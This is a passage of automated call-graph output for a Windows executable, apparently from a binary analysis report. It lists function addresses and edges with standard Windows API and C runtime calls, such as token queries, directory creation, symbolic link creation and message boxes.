17207->17209 17210 7ff7ff59db5c 17208->17210 17213 7ff7ff59dbdd 17208->17213 17212 7ff7ff59db3d __scrt_get_show_window_mode 17209->17212 17211 7ff7ff59de64 46 API calls 17210->17211 17211->17212 17212->17164 17213->17212 17214 7ff7ff594830 45 API calls 17213->17214 17214->17212 17216 7ff7ff5a416f fegetenv 17215->17216 17217 7ff7ff5a7e9c 37 API calls 17216->17217 17220 7ff7ff5a41c2 17217->17220 17218 7ff7ff5a42b2 17219 7ff7ff5a7e9c 37 API calls 17218->17219 17221 7ff7ff5a42dc 17219->17221 17220->17218 17223 7ff7ff5a428c 17220->17223 17229 7ff7ff5a41dd 17220->17229 17224 7ff7ff5a7e9c 37 API calls 17221->17224 17222 7ff7ff59a514 __std_exception_copy 37 API calls 17225 7ff7ff5a426d 17222->17225 17227 7ff7ff59a514 __std_exception_copy 37 API calls 17223->17227 17230 7ff7ff5a42ed 17224->17230 17226 7ff7ff5a5394 17225->17226 17235 7ff7ff5a4275 17225->17235 17231 7ff7ff59a970 _isindst 17 API calls 17226->17231 17227->17225 17228 7ff7ff5a41ef 17228->17222 17229->17218 17229->17228 17232 7ff7ff5a8090 20 API calls 17230->17232 17233 7ff7ff5a53a9 17231->17233 17242 7ff7ff5a4356 __scrt_get_show_window_mode 17232->17242 17234 7ff7ff58c5c0 _log10_special 8 API calls 17236 7ff7ff59e3c1 17234->17236 17235->17234 17260 7ff7ff5a3b64 17236->17260 17237 7ff7ff5a46ff __scrt_get_show_window_mode 17238 7ff7ff5a4397 memcpy_s 17256 7ff7ff5a4cdb memcpy_s __scrt_get_show_window_mode 17238->17256 17258 7ff7ff5a47f3 memcpy_s __scrt_get_show_window_mode 17238->17258 17239 7ff7ff5a4a3f 17240 7ff7ff5a3c80 37 API calls 17239->17240 17246 7ff7ff5a5157 17240->17246 17241 7ff7ff5a49eb 17241->17239 17243 7ff7ff5a53ac memcpy_s 37 API calls 17241->17243 17242->17237 17242->17238 17244 7ff7ff594f78 _set_fmode 11 API calls 17242->17244 17243->17239 17245 7ff7ff5a47d0 17244->17245 17247 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17245->17247 17249 7ff7ff5a53ac memcpy_s 37 API calls 17246->17249 17253 7ff7ff5a51b2 17246->17253 17247->17238 17248 7ff7ff5a5338 17251 7ff7ff5a7e9c 37 API calls 17248->17251 17249->17253 17250 7ff7ff594f78 11 API calls _set_fmode 17250->17256 17251->17235 17252 7ff7ff594f78 11 API calls _set_fmode 17252->17258 17253->17248 17257 7ff7ff5a3c80 37 API calls 17253->17257 17259 7ff7ff5a53ac memcpy_s 37 API calls 17253->17259 17254 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 17254->17256 17255 7ff7ff59a950 37 API calls _invalid_parameter_noinfo 17255->17258 17256->17239 17256->17241 17256->17250 17256->17254 17257->17253 17258->17241 17258->17252 17258->17255 17259->17253 17261 7ff7ff5a3b83 17260->17261 17262 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17261->17262 17263 7ff7ff5a3bae memcpy_s 17261->17263 17262->17263 17263->17186 17265 7ff7ff59e248 memcpy_s 17264->17265 17266 7ff7ff594830 45 API calls 17265->17266 17267 7ff7ff59e302 memcpy_s __scrt_get_show_window_mode 17265->17267 17266->17267 17267->17191 17269 7ff7ff59df9b 17268->17269 17272 7ff7ff59dfe8 memcpy_s 17268->17272 17270 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17269->17270 17271 7ff7ff59dfc7 17270->17271 17271->17191 17273 7ff7ff59e053 17272->17273 17275 7ff7ff594830 45 API calls 17272->17275 17274 7ff7ff59a514 __std_exception_copy 37 API calls 17273->17274 17276 7ff7ff59e095 memcpy_s 17274->17276 17275->17273 17277 7ff7ff59a970 _isindst 17 API calls 17276->17277 17278 7ff7ff59e140 17277->17278 17280 7ff7ff590cbe 17279->17280 17281 7ff7ff590ccf 17279->17281 17280->17106 17281->17280 17282 7ff7ff59d66c _fread_nolock 12 API calls 17281->17282 17283 7ff7ff590d00 17282->17283 17284 7ff7ff590d14 17283->17284 17285 7ff7ff59a9b8 __free_lconv_num 11 API calls 17283->17285 17286 7ff7ff59a9b8 __free_lconv_num 11 API calls 17284->17286 17285->17284 17286->17280 17288 7ff7ff5947d6 17287->17288 17289 7ff7ff5947de 17287->17289 17290 7ff7ff594830 45 API calls 17288->17290 17289->17117 17290->17289 17292 7ff7ff59da41 17291->17292 17293 7ff7ff59486f 17291->17293 17292->17293 17294 7ff7ff5a3374 45 API calls 17292->17294 17295 7ff7ff59da94 17293->17295 17294->17293 17296 7ff7ff59487f 17295->17296 17297 7ff7ff59daad 17295->17297 17296->17039 17297->17296 17298 7ff7ff5a26c0 45 API calls 17297->17298 17298->17296 17305 7ff7ff5a6df8 17299->17305 17303 7ff7ff59f919 MultiByteToWideChar 17302->17303 17308 7ff7ff5a6e5c 17305->17308 17306 7ff7ff58c5c0 _log10_special 8 API calls 17307 7ff7ff5a012d 17306->17307 17307->17140 17308->17306 17310 7ff7ff59107f 17309->17310 17311 7ff7ff59106d 17309->17311 17314 7ff7ff59108d 17310->17314 17319 7ff7ff5910c9 17310->17319 17312 7ff7ff594f78 _set_fmode 11 API calls 17311->17312 17313 7ff7ff591072 17312->17313 17315 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17313->17315 17316 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17314->17316 17318 7ff7ff59107d 17315->17318 17316->17318 17317 7ff7ff591445 17317->17318 17320 7ff7ff594f78 _set_fmode 11 API calls 17317->17320 17318->17003 17319->17317 17321 7ff7ff594f78 _set_fmode 11 API calls 17319->17321 17322 7ff7ff5916d9 17320->17322 17323 7ff7ff59143a 17321->17323 17324 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17322->17324 17325 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17323->17325 17324->17318 17325->17317 17327 7ff7ff590774 17326->17327 17354 7ff7ff5904d4 17327->17354 17329 7ff7ff59078d 17329->16657 17366 7ff7ff59042c 17330->17366 17334 7ff7ff58c8c0 17333->17334 17335 7ff7ff582930 GetCurrentProcessId 17334->17335 17336 7ff7ff581c80 49 API calls 17335->17336 17337 7ff7ff582979 17336->17337 17380 7ff7ff5949f4 17337->17380 17342 7ff7ff581c80 49 API calls 17343 7ff7ff5829ff 17342->17343 17410 7ff7ff582620 17343->17410 17346 7ff7ff58c5c0 _log10_special 8 API calls 17347 7ff7ff582a31 17346->17347 17347->16696 17349 7ff7ff590189 17348->17349 17350 7ff7ff581b89 17348->17350 17351 7ff7ff594f78 _set_fmode 11 API calls 17349->17351 17350->16695 17350->16696 17352 7ff7ff59018e 17351->17352 17353 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17352->17353 17353->17350 17355 7ff7ff59053e 17354->17355 17356 7ff7ff5904fe 17354->17356 17355->17356 17358 7ff7ff59054a 17355->17358 17357 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17356->17357 17359 7ff7ff590525 17357->17359 17365 7ff7ff5954dc EnterCriticalSection 17358->17365 17359->17329 17367 7ff7ff581a20 17366->17367 17368 7ff7ff590456 17366->17368 17367->16664 17367->16665 17368->17367 17369 7ff7ff5904a2 17368->17369 17370 7ff7ff590465 __scrt_get_show_window_mode 17368->17370 17379 7ff7ff5954dc EnterCriticalSection 17369->17379 17372 7ff7ff594f78 _set_fmode 11 API calls 17370->17372 17374 7ff7ff59047a 17372->17374 17376 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17374->17376 17376->17367 17384 7ff7ff594a4e 17380->17384 17381 7ff7ff594a73 17382 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17381->17382 17386 7ff7ff594a9d 17382->17386 17383 7ff7ff594aaf 17419 7ff7ff592c80 17383->17419 17384->17381 17384->17383 17387 7ff7ff58c5c0 _log10_special 8 API calls 17386->17387 17389 7ff7ff5829c3 17387->17389 17388 7ff7ff59a9b8 __free_lconv_num 11 API calls 17388->17386 17398 7ff7ff5951d0 17389->17398 17391 7ff7ff594b61 17396 7ff7ff59a9b8 __free_lconv_num 11 API calls 17391->17396 17392 7ff7ff594b8c 17392->17388 17393 7ff7ff594b58 17393->17391 17393->17392 17394 7ff7ff594bb0 17394->17392 17395 7ff7ff594bba 17394->17395 17397 7ff7ff59a9b8 __free_lconv_num 11 API calls 17395->17397 17396->17386 17397->17386 17399 7ff7ff59b338 _set_fmode 11 API calls 17398->17399 17400 7ff7ff5951e7 17399->17400 17401 7ff7ff59ec08 _set_fmode 11 API calls 17400->17401 17403 7ff7ff595227 17400->17403 17407 7ff7ff5829e5 17400->17407 17402 7ff7ff59521c 17401->17402 17404 7ff7ff59a9b8 __free_lconv_num 11 API calls 17402->17404 17403->17407 17557 7ff7ff59ec90 17403->17557 17404->17403 17407->17342 17408 7ff7ff59a970 _isindst 17 API calls 17409 7ff7ff59526c 17408->17409 17411 7ff7ff58262f 17410->17411 17412 7ff7ff589400 2 API calls 17411->17412 17413 7ff7ff582660 17412->17413 17414 7ff7ff582683 MessageBoxA 17413->17414 17415 7ff7ff58266f MessageBoxW 17413->17415 17416 7ff7ff582690 17414->17416 17415->17416 17417 7ff7ff58c5c0 _log10_special 8 API calls 17416->17417 17418 7ff7ff5826a0 17417->17418 17418->17346 17420 7ff7ff592cbe 17419->17420 17421 7ff7ff592cae 17419->17421 17422 7ff7ff592cc7 17420->17422 17429 7ff7ff592cf5 17420->17429 17425 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17421->17425 17423 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17422->17423 17424 7ff7ff592ced 17423->17424 17424->17391 17424->17392 17424->17393 17424->17394 17425->17424 17426 7ff7ff594830 45 API calls 17426->17429 17428 7ff7ff592fa4 17431 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17428->17431 17429->17421 17429->17424 17429->17426 17429->17428 17433 7ff7ff593610 17429->17433 17459 7ff7ff5932d8 17429->17459 17489 7ff7ff592b60 17429->17489 17431->17421 17434 7ff7ff593652 17433->17434 17435 7ff7ff5936c5 17433->17435 17436 7ff7ff5936ef 17434->17436 17437 7ff7ff593658 17434->17437 17438 7ff7ff59371f 17435->17438 17439 7ff7ff5936ca 17435->17439 17506 7ff7ff591bc0 17436->17506 17445 7ff7ff59365d 17437->17445 17448 7ff7ff59372e 17437->17448 17438->17436 17438->17448 17457 7ff7ff593688 17438->17457 17440 7ff7ff5936ff 17439->17440 17441 7ff7ff5936cc 17439->17441 17513 7ff7ff5917b0 17440->17513 17442 7ff7ff59366d 17441->17442 17447 7ff7ff5936db 17441->17447 17458 7ff7ff59375d 17442->17458 17492 7ff7ff593f74 17442->17492 17445->17442 17449 7ff7ff5936a0 17445->17449 17445->17457 17447->17436 17451 7ff7ff5936e0 17447->17451 17448->17458 17520 7ff7ff591fd0 17448->17520 17449->17458 17502 7ff7ff594430 17449->17502 17454 7ff7ff5945c8 37 API calls 17451->17454 17451->17458 17453 7ff7ff58c5c0 _log10_special 8 API calls 17455 7ff7ff5939f3 17453->17455 17454->17457 17455->17429 17457->17458 17527 7ff7ff59e8c8 17457->17527 17458->17453 17460 7ff7ff5932e3 17459->17460 17461 7ff7ff5932f9 17459->17461 17463 7ff7ff593652 17460->17463 17464 7ff7ff5936c5 17460->17464 17477 7ff7ff593337 17460->17477 17462 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17461->17462 17461->17477 17462->17477 17465 7ff7ff5936ef 17463->17465 17466 7ff7ff593658 17463->17466 17467 7ff7ff59371f 17464->17467 17468 7ff7ff5936ca 17464->17468 17472 7ff7ff591bc0 38 API calls 17465->17472 17475 7ff7ff59365d 17466->17475 17479 7ff7ff59372e 17466->17479 17467->17465 17467->17479 17487 7ff7ff593688 17467->17487 17469 7ff7ff5936ff 17468->17469 17470 7ff7ff5936cc 17468->17470 17473 7ff7ff5917b0 38 API calls 17469->17473 17471 7ff7ff59366d 17470->17471 17476 7ff7ff5936db 17470->17476 17474 7ff7ff593f74 47 API calls 17471->17474 17488 7ff7ff59375d 17471->17488 17472->17487 17473->17487 17474->17487 17475->17471 17478 7ff7ff5936a0 17475->17478 17475->17487 17476->17465 17481 7ff7ff5936e0 17476->17481 17477->17429 17482 7ff7ff594430 47 API calls 17478->17482 17478->17488 17480 7ff7ff591fd0 38 API calls 17479->17480 17479->17488 17480->17487 17484 7ff7ff5945c8 37 API calls 17481->17484 17481->17488 17482->17487 17483 7ff7ff58c5c0 _log10_special 8 API calls 17485 7ff7ff5939f3 17483->17485 17484->17487 17485->17429 17486 7ff7ff59e8c8 47 API calls 17486->17487 17487->17486 17487->17488 17488->17483 17540 7ff7ff590d84 17489->17540 17493 7ff7ff593f96 17492->17493 17494 7ff7ff590bf0 12 API calls 17493->17494 17495 7ff7ff593fde 17494->17495 17496 7ff7ff59e5e0 46 API calls 17495->17496 17497 7ff7ff5940b1 17496->17497 17498 7ff7ff594830 45 API calls 17497->17498 17499 7ff7ff5940d3 17497->17499 17498->17499 17500 7ff7ff594830 45 API calls 17499->17500 17501 7ff7ff59415c 17499->17501 17500->17501 17501->17457 17503 7ff7ff594448 17502->17503 17505 7ff7ff5944b0 17502->17505 17504 7ff7ff59e8c8 47 API calls 17503->17504 17503->17505 17504->17505 17505->17457 17507 7ff7ff591bf3 17506->17507 17508 7ff7ff591c22 17507->17508 17510 7ff7ff591cdf 17507->17510 17509 7ff7ff590bf0 12 API calls 17508->17509 17512 7ff7ff591c5f 17508->17512 17509->17512 17511 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17510->17511 17511->17512 17512->17457 17514 7ff7ff5917e3 17513->17514 17515 7ff7ff591812 17514->17515 17517 7ff7ff5918cf 17514->17517 17516 7ff7ff590bf0 12 API calls 17515->17516 17519 7ff7ff59184f 17515->17519 17516->17519 17518 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17517->17518 17518->17519 17519->17457 17521 7ff7ff592003 17520->17521 17522 7ff7ff592032 17521->17522 17524 7ff7ff5920ef 17521->17524 17523 7ff7ff590bf0 12 API calls 17522->17523 17526 7ff7ff59206f 17522->17526 17523->17526 17525 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17524->17525 17525->17526 17526->17457 17528 7ff7ff59e8f0 17527->17528 17529 7ff7ff59e91e __scrt_get_show_window_mode 17528->17529 17530 7ff7ff59e935 17528->17530 17531 7ff7ff594830 45 API calls 17528->17531 17533 7ff7ff59e8f5 __scrt_get_show_window_mode 17528->17533 17532 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17529->17532 17529->17533 17530->17529 17530->17533 17537 7ff7ff5a0858 17530->17537 17531->17530 17532->17533 17533->17457 17539 7ff7ff5a087c WideCharToMultiByte 17537->17539 17541 7ff7ff590db1 17540->17541 17542 7ff7ff590dc3 17540->17542 17543 7ff7ff594f78 _set_fmode 11 API calls 17541->17543 17544 7ff7ff590dd0 17542->17544 17550 7ff7ff590e0d 17542->17550 17545 7ff7ff590db6 17543->17545 17546 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17544->17546 17547 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17545->17547 17548 7ff7ff590dc1 17546->17548 17547->17548 17548->17429 17549 7ff7ff590eb6 17549->17548 17552 7ff7ff594f78 _set_fmode 11 API calls 17549->17552 17550->17549 17551 7ff7ff594f78 _set_fmode 11 API calls 17550->17551 17553 7ff7ff590eab 17551->17553 17554 7ff7ff590f60 17552->17554 17555 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17553->17555 17556 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17554->17556 17555->17549 17556->17548 17562 7ff7ff59ecad 17557->17562 17558 7ff7ff59ecb2 17559 7ff7ff59524d 17558->17559 17560 7ff7ff594f78 _set_fmode 11 API calls 17558->17560 17559->17407 17559->17408 17561 7ff7ff59ecbc 17560->17561 17563 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17561->17563 17562->17558 17562->17559 17564 7ff7ff59ecfc 17562->17564 17563->17559 17564->17559 17565 7ff7ff594f78 _set_fmode 11 API calls 17564->17565 17565->17561 17567 7ff7ff5887a1 GetTokenInformation 17566->17567 17568 7ff7ff588823 __std_exception_destroy 17566->17568 17569 7ff7ff5887c2 GetLastError 17567->17569 17572 7ff7ff5887cd 17567->17572 17570 7ff7ff588836 CloseHandle 17568->17570 17571 7ff7ff58883c 17568->17571 17569->17568 17569->17572 17570->17571 17571->16714 17572->17568 17573 7ff7ff5887e9 GetTokenInformation 17572->17573 17573->17568 17574 7ff7ff58880c 17573->17574 17574->17568 17575 7ff7ff588816 ConvertSidToStringSidW 17574->17575 17575->17568 17577 7ff7ff58c8c0 17576->17577 17578 7ff7ff582b74 GetCurrentProcessId 17577->17578 17579 7ff7ff5826b0 48 API calls 17578->17579 17580 7ff7ff582bc7 17579->17580 17581 7ff7ff594c48 48 API calls 17580->17581 17582 7ff7ff582c10 MessageBoxW 17581->17582 17583 7ff7ff58c5c0 _log10_special 8 API calls 17582->17583 17584 7ff7ff582c40 17583->17584 17584->16724 17586 7ff7ff5825e5 17585->17586 17587 7ff7ff594c48 48 API calls 17586->17587 17588 7ff7ff582604 17587->17588 17588->16740 17634 7ff7ff598804 17589->17634 17593 7ff7ff5881cc 17592->17593 17594 7ff7ff589400 2 API calls 17593->17594 17595 7ff7ff5881eb 17594->17595 17596 7ff7ff5881f3 17595->17596 17597 7ff7ff588206 ExpandEnvironmentStringsW 17595->17597 17598 7ff7ff582810 49 API calls 17596->17598 17599 7ff7ff58822c __std_exception_destroy 17597->17599 17600 7ff7ff5881ff __std_exception_destroy 17598->17600 17601 7ff7ff588230 17599->17601 17604 7ff7ff588243 17599->17604 17602 7ff7ff58c5c0 _log10_special 8 API calls 17600->17602 17603 7ff7ff582810 49 API calls 17601->17603 17605 7ff7ff58839f 17602->17605 17603->17600 17606 7ff7ff5882af 17604->17606 17607 7ff7ff588251 GetDriveTypeW 17604->17607 17605->16738 17624 7ff7ff5982a8 17605->17624 17608 7ff7ff597e78 45 API calls 17606->17608 17611 7ff7ff5882a0 17607->17611 17612 7ff7ff588285 17607->17612 17610 7ff7ff5882c1 17608->17610 17613 7ff7ff5882c9 17610->17613 17617 7ff7ff5882dc 17610->17617 17757 7ff7ff5979dc 17611->17757 17614 7ff7ff582810 49 API calls 17612->17614 17616 7ff7ff582810 49 API calls 17613->17616 17614->17600 17616->17600 17618 7ff7ff58833e CreateDirectoryW 17617->17618 17619 7ff7ff5826b0 48 API calls 17617->17619 17618->17600 17620 7ff7ff58834d GetLastError 17618->17620 17621 7ff7ff588318 CreateDirectoryW 17619->17621 17620->17600 17622 7ff7ff58835a GetLastError 17620->17622 17621->17617 17623 7ff7ff582c50 51 API calls 17622->17623 17623->17600 17625 7ff7ff5982b5 17624->17625 17626 7ff7ff5982c8 17624->17626 17627 7ff7ff594f78 _set_fmode 11 API calls 17625->17627 17773 7ff7ff597f2c 17626->17773 17629 7ff7ff5982ba 17627->17629 17631 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17629->17631 17632 7ff7ff5982c6 17631->17632 17632->16742 17675 7ff7ff5a15c8 17634->17675 17734 7ff7ff5a1340 17675->17734 17755 7ff7ff5a0348 EnterCriticalSection 17734->17755 17758 7ff7ff5979fa 17757->17758 17761 7ff7ff597a2d 17757->17761 17758->17761 17764 7ff7ff5a04e4 17758->17764 17761->17600 17762 7ff7ff59a970 _isindst 17 API calls 17763 7ff7ff597a5d 17762->17763 17765 7ff7ff5a04f1 17764->17765 17766 7ff7ff5a04fb 17764->17766 17765->17766 17771 7ff7ff5a0517 17765->17771 17767 7ff7ff594f78 _set_fmode 11 API calls 17766->17767 17768 7ff7ff5a0503 17767->17768 17769 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17768->17769 17770 7ff7ff597a29 17769->17770 17770->17761 17770->17762 17771->17770 17772 7ff7ff594f78 _set_fmode 11 API calls 17771->17772 17772->17768 17780 7ff7ff5a0348 EnterCriticalSection 17773->17780 17782 7ff7ff58455a 17781->17782 17783 7ff7ff589400 2 API calls 17782->17783 17784 7ff7ff58457f 17783->17784 17785 7ff7ff58c5c0 _log10_special 8 API calls 17784->17785 17786 7ff7ff5845a7 17785->17786 17786->16777 17789 7ff7ff587e1e 17787->17789 17788 7ff7ff587f42 17792 7ff7ff58c5c0 _log10_special 8 API calls 17788->17792 17789->17788 17790 7ff7ff581c80 49 API calls 17789->17790 17791 7ff7ff587ea5 17790->17791 17791->17788 17794 7ff7ff581c80 49 API calls 17791->17794 17795 7ff7ff584550 10 API calls 17791->17795 17796 7ff7ff587efb 17791->17796 17793 7ff7ff587f73 17792->17793 17793->16777 17794->17791 17795->17791 17797 7ff7ff589400 2 API calls 17796->17797 17798 7ff7ff587f13 CreateDirectoryW 17797->17798 17798->17788 17798->17791 17800 7ff7ff581637 17799->17800 17801 7ff7ff581613 17799->17801 17803 7ff7ff5845b0 108 API calls 17800->17803 17920 7ff7ff581050 17801->17920 17805 7ff7ff58164b 17803->17805 17804 7ff7ff581618 17806 7ff7ff58162e 17804->17806 17810 7ff7ff582710 54 API calls 17804->17810 17807 7ff7ff581653 17805->17807 17808 7ff7ff581682 17805->17808 17806->16777 17811 7ff7ff594f78 _set_fmode 11 API calls 17807->17811 17809 7ff7ff5845b0 108 API calls 17808->17809 17812 7ff7ff581696 17809->17812 17810->17806 17813 7ff7ff581658 17811->17813 17814 7ff7ff58169e 17812->17814 17815 7ff7ff5816b8 17812->17815 17816 7ff7ff582910 54 API calls 17813->17816 17817 7ff7ff582710 54 API calls 17814->17817 17818 7ff7ff590744 73 API calls 17815->17818 17819 7ff7ff581671 17816->17819 17820 7ff7ff5816ae 17817->17820 17821 7ff7ff5816cd 17818->17821 17819->16777 17824 7ff7ff5900bc 74 API calls 17820->17824 17822 7ff7ff5816f9 17821->17822 17823 7ff7ff5816d1 17821->17823 17826 7ff7ff581717 17822->17826 17827 7ff7ff5816ff 17822->17827 17825 7ff7ff594f78 _set_fmode 11 API calls 17823->17825 17828 7ff7ff581829 17824->17828 17829 7ff7ff5816d6 17825->17829 17832 7ff7ff581739 17826->17832 17842 7ff7ff581761 17826->17842 17898 7ff7ff581210 17827->17898 17828->16777 17831 7ff7ff582910 54 API calls 17829->17831 17838 7ff7ff5816ef __std_exception_destroy 17831->17838 17834 7ff7ff594f78 _set_fmode 11 API calls 17832->17834 17833 7ff7ff5900bc 74 API calls 17833->17820 17835 7ff7ff58173e 17834->17835 17836 7ff7ff582910 54 API calls 17835->17836 17836->17838 17837 7ff7ff59040c _fread_nolock 53 API calls 17837->17842 17838->17833 17839 7ff7ff5817da 17840 7ff7ff594f78 _set_fmode 11 API calls 17839->17840 17843 7ff7ff5817ca 17840->17843 17842->17837 17842->17838 17842->17839 17844 7ff7ff5817c5 17842->17844 17951 7ff7ff590b4c 17842->17951 17846 7ff7ff582910 54 API calls 17843->17846 17845 7ff7ff594f78 _set_fmode 11 API calls 17844->17845 17845->17843 17846->17838 17848 7ff7ff58717b 17847->17848 17850 7ff7ff587134 17847->17850 17848->16777 17850->17848 17984 7ff7ff595094 17850->17984 17852 7ff7ff584191 17851->17852 17853 7ff7ff5844d0 49 API calls 17852->17853 17854 7ff7ff5841cb 17853->17854 17855 7ff7ff5844d0 49 API calls 17854->17855 17856 7ff7ff5841db 17855->17856 17857 7ff7ff5841fd 17856->17857 17858 7ff7ff58422c 17856->17858 17999 7ff7ff584100 17857->17999 17860 7ff7ff584100 51 API calls 17858->17860 17861 7ff7ff58422a 17860->17861 17862 7ff7ff58428c 17861->17862 17863 7ff7ff584257 17861->17863 17865 7ff7ff584100 51 API calls 17862->17865 18006 7ff7ff587ce0 17863->18006 17866 7ff7ff5842b0 17865->17866 17869 7ff7ff584100 51 API calls 17866->17869 17880 7ff7ff584302 17866->17880 17868 7ff7ff584287 17874 7ff7ff58c5c0 _log10_special 8 API calls 17868->17874 17872 7ff7ff5842d9 17869->17872 17870 7ff7ff584383 17873 7ff7ff581950 115 API calls 17870->17873 17871 7ff7ff582710 54 API calls 17871->17868 17877 7ff7ff584100 51 API calls 17872->17877 17872->17880 17875 7ff7ff58438d 17873->17875 17876 7ff7ff584425 17874->17876 17878 7ff7ff5843ee 17875->17878 17879 7ff7ff584395 17875->17879 17876->16777 17877->17880 17881 7ff7ff582710 54 API calls 17878->17881 18032 7ff7ff581840 17879->18032 17880->17870 17882 7ff7ff58437c 17880->17882 17883 7ff7ff584307 17880->17883 17885 7ff7ff58436b 17880->17885 17881->17883 17882->17879 17882->17883 17888 7ff7ff582710 54 API calls 17883->17888 17887 7ff7ff582710 54 API calls 17885->17887 17887->17883 17888->17868 17889 7ff7ff5843ac 17892 7ff7ff582710 54 API calls 17889->17892 17890 7ff7ff5843c2 17891 7ff7ff581600 118 API calls 17890->17891 17893 7ff7ff5843d0 17891->17893 17892->17868 17893->17868 17894 7ff7ff582710 54 API calls 17893->17894 17894->17868 17896 7ff7ff581c80 49 API calls 17895->17896 17897 7ff7ff584464 17896->17897 17897->16777 17899 7ff7ff581268 17898->17899 17900 7ff7ff581297 17899->17900 17901 7ff7ff58126f 17899->17901 17904 7ff7ff5812d4 17900->17904 17905 7ff7ff5812b1 17900->17905 17902 7ff7ff582710 54 API calls 17901->17902 17903 7ff7ff581282 17902->17903 17903->17838 17909 7ff7ff5812e6 17904->17909 17914 7ff7ff581309 memcpy_s 17904->17914 17906 7ff7ff594f78 _set_fmode 11 API calls 17905->17906 17907 7ff7ff5812b6 17906->17907 17908 7ff7ff582910 54 API calls 17907->17908 17915 7ff7ff5812cf __std_exception_destroy 17908->17915 17910 7ff7ff594f78 _set_fmode 11 API calls 17909->17910 17911 7ff7ff5812eb 17910->17911 17913 7ff7ff582910 54 API calls 17911->17913 17912 7ff7ff59040c _fread_nolock 53 API calls 17912->17914 17913->17915 17914->17912 17914->17915 17916 7ff7ff5813cf 17914->17916 17918 7ff7ff590b4c 76 API calls 17914->17918 17919 7ff7ff590180 37 API calls 17914->17919 17915->17838 17917 7ff7ff582710 54 API calls 17916->17917 17917->17915 17918->17914 17919->17914 17921 7ff7ff5845b0 108 API calls 17920->17921 17922 7ff7ff58108c 17921->17922 17923 7ff7ff5810a9 17922->17923 17924 7ff7ff581094 17922->17924 17925 7ff7ff590744 73 API calls 17923->17925 17926 7ff7ff582710 54 API calls 17924->17926 17927 7ff7ff5810bf 17925->17927 17932 7ff7ff5810a4 __std_exception_destroy 17926->17932 17928 7ff7ff5810e6 17927->17928 17929 7ff7ff5810c3 17927->17929 17934 7ff7ff5810f7 17928->17934 17935 7ff7ff581122 17928->17935 17930 7ff7ff594f78 _set_fmode 11 API calls 17929->17930 17931 7ff7ff5810c8 17930->17931 17933 7ff7ff582910 54 API calls 17931->17933 17932->17804 17941 7ff7ff5810e1 __std_exception_destroy 17933->17941 17937 7ff7ff594f78 _set_fmode 11 API calls 17934->17937 17936 7ff7ff581129 17935->17936 17945 7ff7ff58113c 17935->17945 17938 7ff7ff581210 92 API calls 17936->17938 17939 7ff7ff581100 17937->17939 17938->17941 17942 7ff7ff582910 54 API calls 17939->17942 17940 7ff7ff5900bc 74 API calls 17943 7ff7ff5811b4 17940->17943 17941->17940 17942->17941 17943->17932 17955 7ff7ff5846e0 17943->17955 17944 7ff7ff59040c _fread_nolock 53 API calls 17944->17945 17945->17941 17945->17944 17947 7ff7ff5811ed 17945->17947 17948 7ff7ff594f78 _set_fmode 11 API calls 17947->17948 17949 7ff7ff5811f2 17948->17949 17950 7ff7ff582910 54 API calls 17949->17950 17950->17941 17952 7ff7ff590b7c 17951->17952 17969 7ff7ff59089c 17952->17969 17954 7ff7ff590b9a 17954->17842 17956 7ff7ff5846f0 17955->17956 17957 7ff7ff589400 2 API calls 17956->17957 17958 7ff7ff58471b 17957->17958 17959 7ff7ff589400 2 API calls 17958->17959 17968 7ff7ff58478e 17958->17968 17961 7ff7ff584736 17959->17961 17960 7ff7ff58c5c0 _log10_special 8 API calls 17962 7ff7ff5847a9 17960->17962 17963 7ff7ff58473b CreateSymbolicLinkW 17961->17963 17961->17968 17962->17932 17964 7ff7ff584765 17963->17964 17963->17968 17965 7ff7ff58476e GetLastError 17964->17965 17964->17968 17966 7ff7ff584779 17965->17966 17965->17968 17967 7ff7ff5846e0 10 API calls 17966->17967 17967->17968 17968->17960 17970 7ff7ff5908bc 17969->17970 17971 7ff7ff5908e9 17969->17971 17970->17971 17972 7ff7ff5908f1 17970->17972 17973 7ff7ff5908c6 17970->17973 17971->17954 17976 7ff7ff5907dc 17972->17976 17974 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17973->17974 17974->17971 17983 7ff7ff5954dc EnterCriticalSection 17976->17983 17985 7ff7ff5950a1 17984->17985 17988 7ff7ff5950ce 17984->17988 17986 7ff7ff594f78 _set_fmode 11 API calls 17985->17986 17991 7ff7ff595058 17985->17991 17990 7ff7ff5950ab 17986->17990 17987 7ff7ff5950f1 17992 7ff7ff594f78 _set_fmode 11 API calls 17987->17992 17988->17987 17989 7ff7ff59510d 17988->17989 17993 7ff7ff594fbc 45 API calls 17989->17993 17994 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17990->17994 17991->17850 17995 7ff7ff5950f6 17992->17995 17998 7ff7ff595101 17993->17998 17997 7ff7ff5950b6 17994->17997 17996 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17995->17996 17996->17998 17997->17850 17998->17850 18000 7ff7ff584126 17999->18000 18001 7ff7ff5949f4 49 API calls 18000->18001 18003 7ff7ff58414c 18001->18003 18002 7ff7ff58415d 18002->17861 18003->18002 18004 7ff7ff584550 10 API calls 18003->18004 18005 7ff7ff58416f 18004->18005 